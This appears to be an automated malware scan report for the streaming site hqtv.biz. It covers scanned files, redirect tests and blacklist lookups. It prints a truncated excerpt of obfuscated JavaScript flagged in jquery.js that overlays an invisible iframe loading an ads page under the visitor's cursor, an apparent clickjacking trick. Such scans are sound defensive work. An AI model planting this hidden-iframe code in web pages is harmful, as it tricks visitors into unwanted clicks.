Scanned pages/files
Request | Server response | Status |
http://hqtv.biz/ | 200 OK Content-Length: 20716 Content-Type: text/html | clean |
http://hqtv.biz/assets/js/jquery-2.1.3.min.js | 200 OK Content-Length: 84319 Content-Type: text/javascript | clean |
http://hqtv.biz/assets/js/bootstrap.min.js | 200 OK Content-Length: 36816 Content-Type: text/javascript | clean |
http://hqtv.biz/assets/js/scripts.js | 200 OK Content-Length: 325 Content-Type: text/javascript | clean |
http://hqtv.biz/assets/js/jquery.js | 200 OK Content-Length: 3276 Content-Type: text/javascript | suspicious |
Suspicious code. Script contains iFrame. ...[107 bytes skipped]... "text/javascript">$(document).ready(function(){setTimeout(function(){$("#djlist").fadeOut("slow")}, 5000);});<\/script>'); var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/ads/index.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:80px;width:120px;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0xd1f7x3,_0xd1f7x4){var _0xd1f7x5= n ...[2247 bytes skipped]... | ||
http://hqtv.biz/orf-1 | 200 OK Content-Length: 21379 Content-Type: text/html | clean |
http://jwpsrv.com/library/4+R8PsscEeO69iIACooLPQ.js | 200 OK Content-Length: 77802 Content-Type: text/javascript | clean |
http://hqtv.biz/orf-2 | 200 OK Content-Length: 21347 Content-Type: text/html | clean |
http://hqtv.biz/france-2 | 200 OK Content-Length: 21382 Content-Type: text/html | clean |
http://hqtv.biz/france-3 | 200 OK Content-Length: 21383 Content-Type: text/html | clean |
http://hqtv.biz/france-4 | 200 OK Content-Length: 21382 Content-Type: text/html | clean |
http://hqtv.biz/france-5 | 200 OK Content-Length: 21383 Content-Type: text/html | clean |
http://hqtv.biz/m6 | 200 OK Content-Length: 21344 Content-Type: text/html | clean |
http://hqtv.biz/3plus | 200 OK Content-Length: 21197 Content-Type: text/html | clean |
http://hqtv.biz/3sat | 200 OK Content-Length: 21345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hqtv.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 27 Jul 2015 11:07:40 GMT
Server: Apache/2.2.15
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: hqtv.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 27 Jul 2015 11:07:40 GMT
Server: Apache/2.2.15
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: hqtv.biz
Referer: http://www.google.com/search?q=hqtv.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hqtv.biz
Referer: http://www.google.com/search?q=hqtv.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hqtv.biz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hqtv.biz/
Result: hqtv.biz is not infected or malware details are not published yet.
Result: hqtv.biz is not infected or malware details are not published yet.